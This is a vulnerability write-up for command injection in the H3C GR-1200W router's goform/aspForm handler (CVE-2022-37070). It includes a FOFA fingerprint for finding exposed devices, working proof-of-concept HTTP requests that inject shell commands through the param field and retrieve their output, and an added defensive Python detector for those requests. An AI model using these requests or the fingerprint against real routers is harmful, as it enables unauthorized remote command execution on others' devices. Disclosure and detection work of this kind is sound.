H3C GR-1200W router: command injection via the param parameter of the DelL2tpLNSList method in goform/aspForm (CVE-2022-37070)
https://github.com/Darry-lang1/vuln/tree/main/H3C/GR-1200W/19
fofa
fid="dhDspYzZwrQeZglXXkew6w=="
exp
POST /goform/aspForm HTTP/1.1
Host: 192.168.0.124:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router_password_mobile.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID=5c31d502
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
CMD=DelL2tpLNSList&param=1; $(ps>/www/1);
exp
Send the request to execute the command:
POST /goform/aspForm HTTP/1.1
Host: 192.168.2.35:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.2.35:8081/userLogin.asp
Accept-Encoding: gzip
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/test);
Fetch the command's output:
GET /test HTTP/1.1
Host: 192.168.2.35:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Referer: http://192.168.2.35:8081/userLogin.asp
Accept-Encoding: gzip
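A defender-side check for the pattern in the requests above, written as an added example that is not part of the original write-up: it parses a raw HTTP request and flags a POST to /goform/aspForm whose param field contains shell syntax, also catching the percent-encoded form. The sample requests and the metacharacter list are constructed assumptions.

```python
"""Detector for the CVE-2022-37070 pattern: a POST to /goform/aspForm whose
``param`` field carries shell syntax.  Added example, not from the write-up;
the sample requests below are constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/goform/aspForm"
INJECTABLE_FIELDS = ("param",)  # the field the write-up shows being injected
# An LNS list index should be a bare number; any of these means shell syntax.
SHELL_META = re.compile(r"\$\(|\$\{|[;&|`<>]")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, body)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    method, target, _version = head.splitlines()[0].split(" ", 2)
    return method, urlsplit(target).path, body

def parse_form(body):
    """Decode a form body into {name: [values]}.  Split on '&' only, so a ';'
    inside a value survives percent-decoding and can be inspected."""
    fields = {}
    for pair in filter(None, body.split("&")):
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields

def inspect_request(raw):
    """Return one finding per tainted field, or [] if the request looks clean."""
    method, path, body = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return []
    fields = parse_form(body)
    cmd = fields.get("CMD", ["?"])[0]
    findings = []
    for name in INJECTABLE_FIELDS:
        for value in fields.get(name, []):
            hit = SHELL_META.search(value)
            if hit:
                findings.append(f"CMD={cmd} {name}={value!r} has {hit.group(0)!r}")
    return findings

HEAD = ("POST /goform/aspForm HTTP/1.1\r\nHost: 192.168.2.35:8081\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
# Constructed samples: the PoC body, the same body percent-encoded, a clean one.
INJECTED = HEAD + "CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/test);"
ENCODED = HEAD + "CMD=DelL2tpLNSList&param=1%3B+%24%28ls%3E%2Fwww%2Ftest%29%3B"
BENIGN = HEAD + "CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1"
```

Run `inspect_request` over each sample: the injected and encoded requests yield the same finding, the benign one yields an empty list.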